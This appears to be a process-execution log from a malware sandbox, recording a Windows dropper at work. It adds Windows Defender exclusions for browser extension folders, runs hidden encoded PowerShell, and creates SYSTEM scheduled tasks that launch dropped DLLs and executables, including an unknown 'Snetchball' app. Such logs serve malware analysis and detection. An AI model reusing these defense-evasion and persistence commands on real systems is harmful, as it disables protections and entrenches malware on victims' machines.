"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "grwmUrXfT" /SC once /ST 01:21:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "grwmUrXfT"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2836 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2996 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3000 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4248 --field-trial-handle=2840,i,2085854678075431589,1333001626228034042,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "grwmUrXfT"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "coQLnzjOCQIuUMNyn" /SC once /ST 00:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe\" Tp /CXZedidGJ 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "coQLnzjOCQIuUMNyn"
C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe
C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe Tp /CXZedidGJ 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5404 -ip 5404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 820
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bhzAbyJhiYArNEwhRY"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OMeOFycTU\znOYOp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VGggbamSlsorNxx" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "VGggbamSlsorNxx2" /F /xml "C:\Program Files (x86)\OMeOFycTU\jJabmpg.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "VGggbamSlsorNxx"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "VGggbamSlsorNxx"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "sWuJIXBYaMGWKZ" /F /xml "C:\Program Files (x86)\RnBNRnIwUzVU2\TrizmLz.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "NNeqJVkrzmhrs2" /F /xml "C:\ProgramData\TtvXSoLtbVXOCJVB\AALhHIl.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "KHgAEdrkAvYTaiAFk2" /F /xml "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\fUiCNqd.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bvOgMXzRBPtqAKitkiY2" /F /xml "C:\Program Files (x86)\NOWTtjuGDiydC\dgUUnMX.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kWTyeDFhQZoEtpUUx" /SC once /ST 01:12:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll\",#1 /jddidvrXq 757674" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "kWTyeDFhQZoEtpUUx"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll",#1 /jddidvrXq 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rLJCaCpfIrfYjdgZ\qLESPtTx\mfPudDb.dll",#1 /jddidvrXq 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2116
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "nAKwq1" /SC once /ST 01:15:47 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "nAKwq1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2404 -ip 2404
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kWTyeDFhQZoEtpUUx"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2032
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nAKwq1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "coQLnzjOCQIuUMNyn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6272 -ip 6272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6356 -ip 6356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 2328
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6112 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,3289033119064524927,8642667654439500293,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe
"C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe" /S
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /delete /tn "MyUTorrentTask" /f
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn "MyUTorrentTask" /tr "C:\Users\Admin\AppData\Roaming\utorrent\pro\uTorrentPro.exe /LHS" /sc minute /mo 10 /st 04:01 /du 02:00 /RL HIGHEST
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2992 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
